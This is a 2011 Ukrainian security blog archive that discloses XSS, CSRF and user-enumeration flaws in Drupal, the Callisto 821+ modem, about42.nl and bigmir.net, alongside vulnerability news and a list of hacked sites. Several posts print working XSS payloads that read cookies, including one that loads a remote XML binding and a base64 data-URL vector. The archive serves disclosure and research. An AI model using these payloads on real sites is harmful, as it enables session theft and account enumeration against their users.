Архів за Червень, 2011

Антивірус для WordPress

20:08 24.06.2011

Існують плагіни для WordPress, що зокрема призначені для виявлення бекдорів в коді файлів движка WP (але вони також можуть, хоча й обмежено, використовуватися для виявлення вірусів на сайті на WP). Це такі плагініи як WordPress Exploit Scanner та Belavir, про які я писав.

Також є такий плагін як AntiVirus for WordPress (який я виявив нещодавно). Цей плагін може використовуватися в якості антивіруса для сайтів на WP.

Він більш потужний ніж вищезгадані плагіни, бо має більше можливостей. Він може як виявляти бекдори, так і виявляти включення malware та SEO спаму в сторінки веб сайту.

Ефективність цього плагіна вища, тому що він сканує не тільки файли сайта, але й записи в БД. В деякій мірі цей веб додаток є конкурентом моїй Web VDS.

XSS і AoF уразливості в Drupal

15:20 24.06.2011

12.04.2011

У серпні, 16.08.2010, я знайшов Cross-Site Scripting та Abuse of Functionality уразливості в Drupal. Які я виявив під час секюріті аудиту на одному сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про Abuse of Functionality уразливості в Drupal.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.06.2011

XSS:

При доданні або зміні даних в будь-яких внутрішніх формах (додання/зміна поста і т.д.) можна провести persistent XSS атаку. XSS код виконається при відвідуванні сторінки редагування (зміна поста і т.д.). Атака проводиться на будь-які форми з включеним FCKeditor/CKEditor (які дуже поширені на сайтах на Drupal). Подібна атака може бути проведена і на форми з TinyMCE - про подібні уразливості в PHP-Nuke через TinyMCE я вже писав.

Для атаки необхідно в поле форми в режимі “Source” вказатиь:
<img onerror="alert(document.cookie)" src="1" />
Також можна відправити POST запит з токеном і атакуючим кодом в параметрі body.

Атака може бути проведена тільки на залогіненого користувача сайта, який є власником даного акаунта, або адміна сайта. Тобто або користувача сам збереже атакуючий код і заманить на цю сторінку адміна, або, з врахування анти-CSRF захисту, через reflected XSS уразливість буде отриманий токен і на користувача або адміна буде проведена persistent XSS атака.

Abuse of Functionality:

При спеціальному запиту до пошуку по користувачам можна визначити логіни всіх користувачів на сайті.

http://site/search/user/%25
http://site/search/user_search/%25

В rss-фідах сайта, зокрема в основному rss-фиді (http://site/rss.xml) можна визначити логині користувачів на сайті, матеріали яких виводяться в даному фіді.

Уразливі Drupal 6.22 та попереднії версії (перевірено в Drupal 6.17). Враховуючи, що розробники не виправили дані уразливості, то версії 7.x також повинні бути вразливими.

Нові CSRF і XSS уразливості в ADSL модемі Callisto 821+

23:55 23.06.2011

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, яка вразлива до CSRF). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, через CSRF можлива зміна параметрів IP App порта.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) через CSRF можлива зміна параметрів IP App порта.

XSS:

Окрім раніше згаданих сторінок 8, 10, 12, 95 і 96 для налаштування портів, в диапазоні 1..196 існує чимало інших розділів (де є форма з параметрами, в якій є persistent XSS уразливості). Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

Зокрема в розділі Ip App Port Configuration (http://192.168.1.1/configuration/ports.html?194), останньому робочому розділі, у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Ip App Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?194) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

DLL Hijacking eксплоіт для Firefox

22:46 23.06.2011

Продовжуючи розпочату традицію, після попереднього відео про інфікований goggle.com, пропоную нове відео на веб секюріті тематику. Цього разу відео про DLL Hijacking eксплоіт для Firefox. Рекомендую подивитися всім хто цікавиться цією темою.

Metasploit DLL Hijacking Exploit - Firefox

В даному відео ролику демонструється використання експлоіта (зробленого в Metasploit Framework) для DLL Hijacking уразливості в Firefox 3.6. Причому атака відбувається частково через IE (тому вона можлива лише в системах, де одночасно присутні обидва Firefox та IE). Експлоіт дозволяє проводити віддалене виконання коду в даному браузері.

Атака відбувається при відвідуванні спеціально створеної веб сторінки (що експлуатує дану уразливість). Рекомендую подивитися дане відео для розуміння векторів атак на веб браузери, зокрема на Mozilla Firefox.

Численні уразливості в Adobe Shockwave Player

19:08 23.06.2011

17.06.2011

Виявлені численні уразливості безпеки в Adobe Shockwave Player.

Уразливі версії: Adobe Shockwave Player 11.5.

Численні пошкодження пам’яті, переповнення буфера, виконання коду.

  • Adobe Shockwave Shockwave 3d Asset.x32 DEMX Chunk Substructure Count Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave xtcL Chunk Parsing Integer Overflow Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL Chunk 16-bit Field Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Font Structure Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave DEMX Chunk Multiple Field Parsing Remote Code Execution Vulnerability (деталі)
  • Security update available for Adobe Shockwave Player (деталі)

23.06.2011

Додаткова інформація.

  • Adobe Shockwave Player Remote Code Execution (деталі)
  • Adobe Shockwave Cursor Asset tSAC Chunk Integer Overflow Vulnerability (деталі)
  • Adobe Shockwave Font Asset Heap Overflow Vulnerabilityr Signedness Vulnerability (деталі)
  • Adobe Shockwave Lingo Script Opcodes Integer Signedness Vulnerability (деталі)
  • Adobe Shockwave AudioMixer Structure Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Missing Lctx Chunk Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave GIF Decompression Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Shockwave 3d Asset.x32 DEMX Chunk 0xFFFFFF49 Field Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Shockwave 3d Asset.x32 DEMX 0xFFFFFF45 Field Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave iml32.dll CSWV Chunk Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave TextXtra Text Element Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave tSAC Chunk String Termination Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL Chunk Parsing Misallocation Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave iml32.dll DEMX Chunk GIF Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Lnam Chunk Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL Substructure Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave KEY* Chunk Invalid Size Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL Trusted Offset Chunk Processing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave CASt Chunk Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Director File rcsL Chunk Multiple Opcode Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave Cursor Structure Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL String Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave rcsL Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave dirapi.dll rcsL Chunk Parsing Remote Code Execution Vulnerability (деталі)
  • Adobe Shockwave 3D Asset DEMX Integer Overflow Vulnerability (деталі)

Добірка уразливостей

16:23 23.06.2011

В даній добірці уразливості в веб додатках:

Нові уразливості на about42.nl

23:56 22.06.2011

У червні, 25.06.2010, а також додатково 17.06.2011, я знайшов Brute Force та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на about42.nl.

Brute Force:

http://about42.nl/www/showinfo.php

XSS:

POST запит на сторінці http://about42.nl/www/showinfo.php

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі UserID.

GET/POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>В HTTP заголовках: User-Agent, Accept, Accept-Language, Accept-Encoding, Accept-Charset, Referer, а також майже в будь-яких довільних заголовках.

Дані XSS атаки через заголовки можна провести через флеш, про що я писав в статті Відправка серверних заголовків в Flash. Але враховуючи те, що на сайті немає crossdomain.xml, то атака не спрацює в нових версіях флеш-плагіна (тільки в старих версіях), про що я писав у даній статті.

Тому потрібно буде скористатися іншими методами, зокрема для заголовка User-Agent, про що я розповідав в статті XSS атаки через заголовок User-Agent. Деякі з зазначених методів підійдуть і для інших заголовків.

Похакані сайти №152

22:47 22.06.2011

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://julietta.com.ua (хакером c1nexe)
  • http://www.blinoff.ua (хакерами з RKH) - 08.06.2011, зараз сайт вже виправлений адмінами
  • http://www.gagri.com.ua (хакерами з RKH) - 08.06.2011, зараз сайт вже виправлений адмінами
  • http://www.nhl.kiev.ua (хакерами з RKH) - 08.06.2011, зараз сайт не працює
  • http://www.diagnostika.net.ua (хакером MaMaLi MeSsenGer)

Численні уразливості в Microsoft .Net Framework та Silverlight

19:20 22.06.2011

Виявлені численні уразливості безпеки в Microsoft .Net Framework та Silverlight.

Уразливі продукти: Microsoft .Net Framework та Silverlight на Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Переповнення індексу масиву, виконання коду через компілятор JIT.

  • Microsoft Security Bulletin MS11-039 - Critical Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2514842) (деталі)
  • Microsoft Security Bulletin MS11-044 - Critical Vulnerability in .NET Framework Could Allow Remote Code Execution (2538814) (деталі)

Нова уразливість на bigmir.net

16:02 22.06.2011

13.10.2010

У червні, 27.06.2010, я знайшов нову Cross-Site Scripting уразливість на сайті http://bigmir.net, обійшови їхній WAF (що я вже робив багато разів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на dnevnik.bigmir.net.

Детальна інформація про уразливість з’явиться пізніше.

22.06.2011

XSS:

http://passport.bigmir.net/logout?url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

Дана уразливість вже виправлена. І як і в більшості випадків з Бігміром, зробили вони це втихаря (після мого повідомлення), не подякувавши мені. А варто не забувати дякувати людям. При цьому виправлений лише даний вектор атаки, але можливі інші вектори (при цьому потрібно буде обійти їхній WAF).

Зазначу, що в даному функціоналі є також Redirector уразливість, про яку я писав в 2008 році, і яка досі не виправлена.